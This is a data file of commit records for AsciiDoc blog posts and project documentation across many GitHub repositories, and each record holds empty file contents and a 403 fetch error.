{"commit":"48f4fd8bae6e7b418ce8a61132b7104e93ccae48","subject":"Update 2017-04-20-Week-4-Simple-walk-animation-UI-updates-and-Damage-taken.adoc","message":"Update 2017-04-20-Week-4-Simple-walk-animation-UI-updates-and-Damage-taken.adoc","repos":"mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io","old_file":"_posts\/2017-04-20-Week-4-Simple-walk-animation-UI-updates-and-Damage-taken.adoc","new_file":"_posts\/2017-04-20-Week-4-Simple-walk-animation-UI-updates-and-Damage-taken.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mahrocks\/mahrocks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35ebe76cf45db9d04729aa215b1ea124feae21ca","subject":"Update 2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","message":"Update 2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","new_file":"_posts\/2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f5d62e0b2a0c4052188f630cb51701ee63fcad9d","subject":"Update 2015-02-10-On-how-to-choose-a-stack.adoc","message":"Update 2015-02-10-On-how-to-choose-a-stack.adoc","repos":"vanpelt\/vanpelt.github.io,vanpelt\/vanpelt.github.io,vanpelt\/vanpelt.github.io","old_file":"_posts\/2015-02-10-On-how-to-choose-a-stack.adoc","new_file":"_posts\/2015-02-10-On-how-to-choose-a-stack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vanpelt\/vanpelt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb6ba3afe21593fdc39b59a4bba16650887d7127","subject":"Update 2015-07-15-Development-status-v0102.adoc","message":"Update 2015-07-15-Development-status-v0102.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2015-07-15-Development-status-v0102.adoc","new_file":"_posts\/2015-07-15-Development-status-v0102.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c673260827b6bbdacdbad99369a03c95250bb3bb","subject":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","message":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"755f57759341e1875f97757783917a272e246dd6","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b23a861b167e7b77ed8fafa32478047a72db0bd2","subject":"Update 2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","message":"Update 2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","new_file":"_posts\/2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea675fe03d5b5f64a5440d320a2ef286c1377791","subject":"y2b create post Corsair AX1200i Unboxing (Gaming PC Power Supply - UGPC 2012)","message":"y2b create post Corsair AX1200i Unboxing (Gaming PC Power Supply - UGPC 2012)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-08-13-Corsair-AX1200i-Unboxing-Gaming-PC-Power-Supply--UGPC-2012.adoc","new_file":"_posts\/2012-08-13-Corsair-AX1200i-Unboxing-Gaming-PC-Power-Supply--UGPC-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc4e457a1ea0680bf1ba29f3f5ccd281b499ab83","subject":"Update 2016-03-04-New-System.adoc","message":"Update 2016-03-04-New-System.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2016-03-04-New-System.adoc","new_file":"_posts\/2016-03-04-New-System.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92a774d75baf7c08822dcc47618aab57c1ae75ee","subject":"Update 2016-11-05-Dear-Diary.adoc","message":"Update 2016-11-05-Dear-Diary.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6023344df89dd0f0212560635dcf35b790e604f1","subject":"Publish 2099-1-1-Puzzle-2-Hack-Me-If-You-Can.adoc","message":"Publish 2099-1-1-Puzzle-2-Hack-Me-If-You-Can.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2099-1-1-Puzzle-2-Hack-Me-If-You-Can.adoc","new_file":"2099-1-1-Puzzle-2-Hack-Me-If-You-Can.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5064fd480713916c8130f2fd8129954e309c119","subject":"Update 2015-08-03-Hello-World-20.adoc","message":"Update 2015-08-03-Hello-World-20.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2015-08-03-Hello-World-20.adoc","new_file":"_posts\/2015-08-03-Hello-World-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb6624e7f404451829052512a24162195ac9fb19","subject":"Update 2016-09-06-TWCTF-Writeups.adoc","message":"Update 2016-09-06-TWCTF-Writeups.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-09-06-TWCTF-Writeups.adoc","new_file":"_posts\/2016-09-06-TWCTF-Writeups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2969f2d7b1ffcb8144953a1df0e60d973dd92e37","subject":"updated readme with requirements that should be sent out by email","message":"updated readme with requirements that should be sent out by email\n","repos":"couchbaselabs\/Workshop,couchbaselabs\/Workshop,couchbaselabs\/Workshop","old_file":"connect2016\/developer\/README.adoc","new_file":"connect2016\/developer\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/couchbaselabs\/Workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"622d921e558e2e74e45e083d57ece5fdd0a86c7b","subject":"job #11555 drafted ant","message":"job #11555 drafted ant\n","repos":"travislondon\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,perojonsson\/bridgepoint,lwriemen\/bridgepoint,perojonsson\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,perojonsson\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,perojonsson\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint,perojonsson\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,keithbrown\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,perojonsson\/bridgepoint,travislondon\/bridgepoint,perojonsson\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11555_marking\/11555_marking_ant.adoc","new_file":"doc-bridgepoint\/notes\/11555_marking\/11555_marking_ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmulvey\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3a033d829cd6aab17995b68371e7e136c47cc9b8","subject":"[docs] Add tip on dealing with planned TS downtime","message":"[docs] Add tip on dealing with planned TS downtime\n\nRendering available at\nhttps:\/\/github.com\/wdberkeley\/kudu\/blob\/docfollowerunavailablesec\/docs\/administration.adoc.\n\nChange-Id: I55a992a00f35945187e02c55594edc6e261a72c4\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/11486\nReviewed-by: Andrew Wong <b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\nReviewed-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\nTested-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\n","repos":"helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a27238ac419836db924b3c59af1d72ed42aa0b33","subject":"Update 2014-03-26-Presentation-de-Sails-chez-Sup-Info-Paris.adoc","message":"Update 2014-03-26-Presentation-de-Sails-chez-Sup-Info-Paris.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2014-03-26-Presentation-de-Sails-chez-Sup-Info-Paris.adoc","new_file":"_posts\/2014-03-26-Presentation-de-Sails-chez-Sup-Info-Paris.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"217608c8cb07a835818fbe07f4f27902cde32d4f","subject":"y2b create post The Black Friday Deals They Won't Show You...","message":"y2b create post The Black Friday Deals They Won't Show You...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-23-The-Black-Friday-Deals-They-Wont-Show-You.adoc","new_file":"_posts\/2017-11-23-The-Black-Friday-Deals-They-Wont-Show-You.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7fee0ec15384f8301866d45788c31a058116df04","subject":"[docs] Contributing to blog","message":"[docs] Contributing to blog\n\nSubmitting blog posts are not straightforward, especially if someone\nhasn't used Jekyll and\/or Gerrit. This commit adds a \"blog posts\"\nsection to our contributing docs.\n\nChange-Id: Ifd8ccae4b15b1ad8b679e0d2d8eabdf5fb5e3a09\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/11940\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\nTested-by: Attila Bukor <53758272babe3057a5ff4ad51afd9bfd6e6014a1@apache.org>\n","repos":"helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu","old_file":"docs\/contributing.adoc","new_file":"docs\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b515314082976cac3e6bd9cc265ff6139e6ba55f","subject":"docs(changelog): add changelog to repo","message":"docs(changelog): add changelog to repo\n\nCloses: #2132","repos":"apiman\/apiman,apiman\/apiman,apiman\/apiman,apiman\/apiman,apiman\/apiman","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apiman\/apiman.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"64de99c7bd639a38e1833c895b6a10dd4ef6c084","subject":"Added CHANGELOG","message":"Added CHANGELOG\n","repos":"johncarl81\/parceler,sarvex\/parceler","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sarvex\/parceler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c80338d3372eee3f6c8b3154b37ad78f6299d7d8","subject":"updated chagelog","message":"updated chagelog\n","repos":"sdaschner\/jaxrs-analyzer,cthiebaud\/jaxrs-analyzer,cthiebaud\/jaxrs-analyzer","old_file":"Changelog.adoc","new_file":"Changelog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cthiebaud\/jaxrs-analyzer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6d7a49d9facedb2f292d1216e01bb04f69195ea6","subject":"y2b create post Ultimate Gaming PC Project Episode #4","message":"y2b create post Ultimate Gaming PC Project Episode #4","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-07-30-Ultimate-Gaming-PC-Project-Episode-4.adoc","new_file":"_posts\/2012-07-30-Ultimate-Gaming-PC-Project-Episode-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f5b5fbba8c204d79d3d036038e1f970dfef818a","subject":"Update 2013-04-20-Metaphoric-in-Git.adoc","message":"Update 2013-04-20-Metaphoric-in-Git.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2013-04-20-Metaphoric-in-Git.adoc","new_file":"_posts\/2013-04-20-Metaphoric-in-Git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e153fa6d2ab9e09258750fd12457500c7b7262c4","subject":"Update 2015-10-16-Antonio-Goncalves.adoc","message":"Update 2015-10-16-Antonio-Goncalves.adoc","repos":"geektic\/geektic.github.io,geektic\/geektic.github.io,geektic\/geektic.github.io","old_file":"_posts\/2015-10-16-Antonio-Goncalves.adoc","new_file":"_posts\/2015-10-16-Antonio-Goncalves.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/geektic\/geektic.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"136b8058fb1b7206216c1962b6b1f8a6927b8e3b","subject":"docs: Update release management documentation","message":"docs: Update release management documentation\n\nChange-Id: I43575df56bb36e49a06feffe6efac96a52347c24\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/8744\nReviewed-by: Dan Burkert <2591e5f46f28d303f9dc027d475a5c60d8dea17a@cloudera.com>\nTested-by: Dan Burkert <2591e5f46f28d303f9dc027d475a5c60d8dea17a@cloudera.com>\n","repos":"andrwng\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu","old_file":"RELEASING.adoc","new_file":"RELEASING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a9a1b80ae67b7e75b76a4b8862c77357d450d43b","subject":"[docs] fixup releasing git instructions","message":"[docs] fixup releasing git instructions\n\nChange-Id: I83f98350ddcaf062477db1ee0b90f1811f87524b\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/7876\nTested-by: Kudu Jenkins\nReviewed-by: Jean-Daniel Cryans <4bf4c125525b8623ac45dfd7774cbf531df19085@apache.org>\n","repos":"andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu","old_file":"RELEASING.adoc","new_file":"RELEASING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1e7dc0c72a4c531447311eb52083ef3d2b39fd29","subject":"migration hints to fontawesome","message":"migration hints to fontawesome\n","repos":"swobspace\/wobapphelpers,swobspace\/wobapphelpers,swobspace\/wobapphelpers,swobspace\/wobapphelpers","old_file":"doc\/fontawesome.adoc","new_file":"doc\/fontawesome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/swobspace\/wobapphelpers.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdf2b8f023d47ba37be6a136abd353784fe0b413","subject":"Update 2015-09-20-Python-re-module.adoc","message":"Update 2015-09-20-Python-re-module.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Python-re-module.adoc","new_file":"_posts\/2015-09-20-Python-re-module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b03817b421cf052c39c77ae4f3d1bd1722395de","subject":"Update 2016-03-09-Go-Bean-Progress.adoc","message":"Update 2016-03-09-Go-Bean-Progress.adoc","repos":"caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io","old_file":"_posts\/2016-03-09-Go-Bean-Progress.adoc","new_file":"_posts\/2016-03-09-Go-Bean-Progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/caryfitzhugh\/caryfitzhugh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ec8daa0ecb2ec0a13d28022670aa96b9e029eb4","subject":"Update 2016-03-31-Un-poco-sobre-Linux.adoc","message":"Update 2016-03-31-Un-poco-sobre-Linux.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Un-poco-sobre-Linux.adoc","new_file":"_posts\/2016-03-31-Un-poco-sobre-Linux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"315ac90af8def663e0fe8e11dd49bb466bb18521","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e66fc1acf6c3e70556503399f8473573aa69151","subject":"Blog entry introducing BTM","message":"Blog entry introducing BTM\n","repos":"jotak\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,ppalaga\/hawkular.github.io,metlos\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,metlos\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,ppalaga\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,pilhuhn\/hawkular.github.io,lzoubek\/hawkular.github.io,jpkrohling\/hawkular.github.io,metlos\/hawkular.github.io,objectiser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,tsegismont\/hawkular.github.io,lzoubek\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,metlos\/hawkular.github.io,pilhuhn\/hawkular.github.io,ppalaga\/hawkular.github.io,lucasponce\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/04\/30\/introducing-btm.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/04\/30\/introducing-btm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4cbc1d3602908ae3d5c5d9fe221d0561b0a88b7c","subject":"Update 2015-04-20-Open-source-identity-and-abandonment-issues.adoc","message":"Update 2015-04-20-Open-source-identity-and-abandonment-issues.adoc","repos":"thiderman\/daenney.github.io,thiderman\/daenney.github.io,thiderman\/daenney.github.io","old_file":"_posts\/2015-04-20-Open-source-identity-and-abandonment-issues.adoc","new_file":"_posts\/2015-04-20-Open-source-identity-and-abandonment-issues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thiderman\/daenney.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e164134ef200fccfacf3ad0b52ff85bb48f5726d","subject":"y2b create post Daft Punk R.A.M. Deluxe Box Set Unboxing","message":"y2b create post Daft Punk R.A.M. Deluxe Box Set Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-02-23-Daft-Punk-RAM-Deluxe-Box-Set-Unboxing.adoc","new_file":"_posts\/2014-02-23-Daft-Punk-RAM-Deluxe-Box-Set-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8cbad81f7c629fc189eb095f839660d77ab82562","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 